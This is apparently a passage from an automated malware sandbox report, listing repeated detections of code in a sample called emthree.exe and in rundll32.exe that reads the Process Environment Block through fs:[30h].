Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEAD30 mov eax, dword ptr fs:[00000030h]	1_2_00FEAD30
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B8CD6 mov eax, dword ptr fs:[00000030h]	1_2_010B8CD6
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A14FB mov eax, dword ptr fs:[00000030h]	1_2_010A14FB
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]	1_2_01066CF0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]	1_2_01066CF0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]	1_2_01066CF0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B070D mov eax, dword ptr fs:[00000030h]	1_2_010B070D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B070D mov eax, dword ptr fs:[00000030h]	1_2_010B070D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101A70E mov eax, dword ptr fs:[00000030h]	1_2_0101A70E
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101A70E mov eax, dword ptr fs:[00000030h]	1_2_0101A70E
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100F716 mov eax, dword ptr fs:[00000030h]	1_2_0100F716
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107FF10 mov eax, dword ptr fs:[00000030h]	1_2_0107FF10
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107FF10 mov eax, dword ptr fs:[00000030h]	1_2_0107FF10
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF76E2 mov eax, dword ptr fs:[00000030h]	1_2_00FF76E2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101E730 mov eax, dword ptr fs:[00000030h]	1_2_0101E730
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100B73D mov eax, dword ptr fs:[00000030h]	1_2_0100B73D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100B73D mov eax, dword ptr fs:[00000030h]	1_2_0100B73D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B8F6A mov eax, dword ptr fs:[00000030h]	1_2_010B8F6A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF766D mov eax, dword ptr fs:[00000030h]	1_2_00FF766D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]	1_2_01067794
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]	1_2_01067794
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]	1_2_01067794
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FF7E41
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FF7E41
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FF7E41
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FF7E41
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FF7E41
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FF7E41
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEE620 mov eax, dword ptr fs:[00000030h]	1_2_00FEE620
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010237F5 mov eax, dword ptr fs:[00000030h]	1_2_010237F5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]	1_2_00FEC600
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]	1_2_00FEC600
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]	1_2_00FEC600
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01018E00 mov eax, dword ptr fs:[00000030h]	1_2_01018E00
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1608 mov eax, dword ptr fs:[00000030h]	1_2_010A1608
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101A61C mov eax, dword ptr fs:[00000030h]	1_2_0101A61C
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101A61C mov eax, dword ptr fs:[00000030h]	1_2_0101A61C
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0109FE3F mov eax, dword ptr fs:[00000030h]	1_2_0109FE3F
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AAE44 mov eax, dword ptr fs:[00000030h]	1_2_010AAE44
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AAE44 mov eax, dword ptr fs:[00000030h]	1_2_010AAE44
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF8794 mov eax, dword ptr fs:[00000030h]	1_2_00FF8794
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]	1_2_0100AE73
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]	1_2_0100AE73
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]	1_2_0100AE73
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]	1_2_0100AE73
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]	1_2_0100AE73
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107FE87 mov eax, dword ptr fs:[00000030h]	1_2_0107FE87
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFFF60 mov eax, dword ptr fs:[00000030h]	1_2_00FFFF60
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010646A7 mov eax, dword ptr fs:[00000030h]	1_2_010646A7
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]	1_2_010B0EA5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]	1_2_010B0EA5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]	1_2_010B0EA5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFEF40 mov eax, dword ptr fs:[00000030h]	1_2_00FFEF40
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01028EC7 mov eax, dword ptr fs:[00000030h]	1_2_01028EC7
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0109FEC0 mov eax, dword ptr fs:[00000030h]	1_2_0109FEC0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010136CC mov eax, dword ptr fs:[00000030h]	1_2_010136CC
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE4F2E mov eax, dword ptr fs:[00000030h]	1_2_00FE4F2E
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE4F2E mov eax, dword ptr fs:[00000030h]	1_2_00FE4F2E
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B8ED6 mov eax, dword ptr fs:[00000030h]	1_2_010B8ED6
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010116E0 mov ecx, dword ptr fs:[00000030h]	1_2_010116E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]	6_2_04F26CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]	6_2_04F26CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]	6_2_04F26CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F614FB mov eax, dword ptr fs:[00000030h]	6_2_04F614FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F78CD6 mov eax, dword ptr fs:[00000030h]	6_2_04F78CD6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB849B mov eax, dword ptr fs:[00000030h]	6_2_04EB849B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EC746D mov eax, dword ptr fs:[00000030h]	6_2_04EC746D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]	6_2_04EDAC7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F3C450 mov eax, dword ptr fs:[00000030h]	6_2_04F3C450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F3C450 mov eax, dword ptr fs:[00000030h]	6_2_04F3C450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDA44B mov eax, dword ptr fs:[00000030h]	6_2_04EDA44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDBC2C mov eax, dword ptr fs:[00000030h]	6_2_04EDBC2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]	6_2_04F61C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]	6_2_04F26C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]	6_2_04F26C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]	6_2_04F26C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]	6_2_04F26C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]	6_2_04F7740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]	6_2_04F7740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]	6_2_04F7740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F58DF1 mov eax, dword ptr fs:[00000030h]	6_2_04F58DF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EBD5E0 mov eax, dword ptr fs:[00000030h]	6_2_04EBD5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EBD5E0 mov eax, dword ptr fs:[00000030h]	6_2_04EBD5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]	6_2_04F6FDE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]	6_2_04F6FDE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]	6_2_04F6FDE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]	6_2_04F6FDE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]	6_2_04F26DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]	6_2_04F26DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]	6_2_04F26DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26DC9 mov ecx, dword ptr fs:[00000030h]	6_2_04F26DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]	6_2_04F26DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]	6_2_04F26DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED35A1 mov eax, dword ptr fs:[00000030h]	6_2_04ED35A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]	6_2_04ED1DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]	6_2_04ED1DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]	6_2_04ED1DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F705AC mov eax, dword ptr fs:[00000030h]	6_2_04F705AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F705AC mov eax, dword ptr fs:[00000030h]	6_2_04F705AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]	6_2_04EA2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]	6_2_04EA2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]	6_2_04EA2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]	6_2_04EA2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]	6_2_04EA2D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]	6_2_04ED2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]	6_2_04ED2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]	6_2_04ED2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]	6_2_04ED2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]	6_2_04F62D82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]	6_2_04F62D82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]	6_2_04F62D82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]	6_2_04F62D82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]	6_2_04F62D82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]	6_2_04F62D82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]	6_2_04F62D82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDFD9B mov eax, dword ptr fs:[00000030h]	6_2_04EDFD9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDFD9B mov eax, dword ptr fs:[00000030h]	6_2_04EDFD9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECC577 mov eax, dword ptr fs:[00000030h]	6_2_04ECC577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECC577 mov eax, dword ptr fs:[00000030h]	6_2_04ECC577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE3D43 mov eax, dword ptr fs:[00000030h]	6_2_04EE3D43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F23540 mov eax, dword ptr fs:[00000030h]	6_2_04F23540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F53D40 mov eax, dword ptr fs:[00000030h]	6_2_04F53D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EC7D50 mov eax, dword ptr fs:[00000030h]	6_2_04EC7D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F78D34 mov eax, dword ptr fs:[00000030h]	6_2_04F78D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F2A537 mov eax, dword ptr fs:[00000030h]	6_2_04F2A537
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F6E539 mov eax, dword ptr fs:[00000030h]	6_2_04F6E539
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]	6_2_04ED4D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]	6_2_04ED4D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED4D3B mov eax, dword ptr fs:[00000030h]	6_2_04ED4D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EAAD30 mov eax, dword ptr fs:[00000030h]	6_2_04EAAD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB3D34 mov eax, dword ptr fs:[00000030h]	6_2_04EB3D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB76E2 mov eax, dword ptr fs:[00000030h]	6_2_04EB76E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED16E0 mov ecx, dword ptr fs:[00000030h]	6_2_04ED16E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F78ED6 mov eax, dword ptr fs:[00000030h]	6_2_04F78ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED36CC mov eax, dword ptr fs:[00000030h]	6_2_04ED36CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE8EC7 mov eax, dword ptr fs:[00000030h]	6_2_04EE8EC7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F5FEC0 mov eax, dword ptr fs:[00000030h]	6_2_04F5FEC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]	6_2_04F70EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]	6_2_04F70EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F70EA5 mov eax, dword ptr fs:[00000030h]	6_2_04F70EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F246A7 mov eax, dword ptr fs:[00000030h]	6_2_04F246A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F3FE87 mov eax, dword ptr fs:[00000030h]	6_2_04F3FE87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB766D mov eax, dword ptr fs:[00000030h]	6_2_04EB766D
